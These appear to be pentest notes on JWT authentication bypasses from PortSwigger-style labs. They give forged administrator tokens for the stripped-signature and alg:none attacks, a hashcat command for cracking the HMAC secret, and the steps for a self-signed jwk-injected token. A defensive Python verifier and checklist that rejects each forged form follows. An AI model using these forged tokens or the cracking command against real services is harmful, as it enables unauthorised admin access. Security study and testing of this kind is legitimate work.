JWT
Unverified signature auth bypass
# Remove the signature segment of the JWT cookie, or change some payload values,
# and check whether the app still accepts the token (a redirect to login means it was rejected)
eyJraWQiOiIyYjRmMGUyZi04OTk4LTRlMDYtOTI4Ni1kZGY1YTE3NTczMDgiLCJhbGciOiJSUzI1NiJ9.ewogICJpc3MiOiAicG9ydHN3aWdnZXIiLAogICJzdWIiOiAiYWRtaW5pc3RyYXRvciIsCiAgImV4cCI6IDE2OTY4NjAxNTQKfQ.

None algorithm attack
# Set "alg": "none" in the header and leave out the trailing signature segment
ewogICJraWQiOiAiZjZjMWFmYWYtMmFhNS00NjBlLWFlMzQtMGEwMmI0ZDQ1ZWVjIiwKICAiYWxnIjogIm5vbmUiCn0.ewogICJpc3MiOiAicG9ydHN3aWdnZXIiLAogICJzdWIiOiAiYWRtaW5pc3RyYXRvciIsCiAgImV4cCI6IDE2OTY4NjEyNTIKfQ.

Crack JWT secret
# Hashcat (mode 16500 = JWT), dictionary attack against the HMAC secret
hashcat -a 0 -m 16500 <JWT token file> <wordlist>

Self-signed JWT via jwk header injection
# Generate a new RSA key in Burp's JWT Editor extension
# Switch to the JSON Web Token tab in Burp Repeater
# Change the JWT payload and click Attack
# Observe the application's response
# Example of a self-signed JWT token
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.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2OTY4NjM3MTR9.vMTme9GhtvIFxLwQLVYCr-x2LB3cTwoU_65uxDivdykSzQmos2BXeSxyZ1bvYi9bPhDMS84jzE78gmOga8YWqIBSsCHtc56qcRVu1ONhOEhUF7bPC4zQU9PT9Lb6q9rsMmo9LcK7jlLD0GohqhIjsNk-d2hEao-jf8SzDhyMZGEt1kbUqi-MOOc7zwLKnTeuZAu3wKs_TcRhv8WwxH3QtX9wpZEWbZLWobYVoksasthkDHarnGgpnMDolAUUfzWISH-LaCTFEkDxa6IabT8FXMKxVYgU1GHx5YvPOQIpYltfj5MZXDl02XwEqsnSOr0xvZueEHJXQDoi-1tNWyIfIA
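A minimal server-side verifier that closes every hole in the notes above, added here as an example (not code from these notes, from PortSwigger or from Burp's JWT Editor): it pins the algorithm to HS256 so alg:none is refused, ignores any jwk/jku/x5u key the header carries, rejects a missing or mismatched signature and enforces exp. SECRET, the sample claims and the "attacker-key" secret are constructed for the demo; it uses only the Python standard library.

```python
import base64, hashlib, hmac, json

SECRET = b"demo-secret-not-for-production"  # constructed; a real service loads this from a key store

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def issue_hs256(payload: dict, secret: bytes = SECRET) -> str:
    # Mint a token the way the server does: HS256 over "header.payload"
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, now: int, secret: bytes = SECRET) -> tuple[bool, str]:
    # Returns (accepted, reason); each check maps to one attack in the notes
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed: expected header.payload.signature"
    h_b64, p_b64, s_b64 = parts
    try:
        header, payload = json.loads(b64url_decode(h_b64)), json.loads(b64url_decode(p_b64))
        sig = b64url_decode(s_b64)
    except ValueError:  # binascii.Error, JSONDecodeError and UnicodeDecodeError all subclass it
        return False, "malformed: undecodable segment"
    if not isinstance(header, dict) or header.get("alg") != "HS256":  # alg pinned server-side
        return False, "algorithm not pinned to HS256"  # so alg:none is refused here
    if any(k in header for k in ("jwk", "jku", "x5u")):  # client-chosen key sources are ignored
        return False, "key material in header not allowed"
    if not sig:
        return False, "missing signature"
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time compare
        return False, "signature mismatch"
    if not isinstance(payload, dict) or not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        return False, "expired or missing exp"
    return True, "ok"

def checklist_results(now: int = 1_700_000_000) -> dict:
    # Constructed good token plus the tampered forms the notes describe
    good = issue_hs256({"iss": "portswigger", "sub": "user", "exp": now + 600})
    admin = b64url_encode(json.dumps({"sub": "administrator", "exp": now + 600}).encode())
    none_hdr = b64url_encode(json.dumps({"alg": "none"}).encode())
    return {
        "valid": verify_hs256(good, now),
        "signature_stripped": verify_hs256(f"{good.split('.')[0]}.{admin}.", now),
        "alg_none": verify_hs256(f"{none_hdr}.{admin}.", now),
        "self_signed_other_key": verify_hs256(issue_hs256({"sub": "administrator", "exp": now + 600}, b"attacker-key"), now),
    }
```

checklist_results() feeds the verifier a good token plus the stripped-signature, alg:none and self-signed variants from the notes; only the good one comes back (True, "ok").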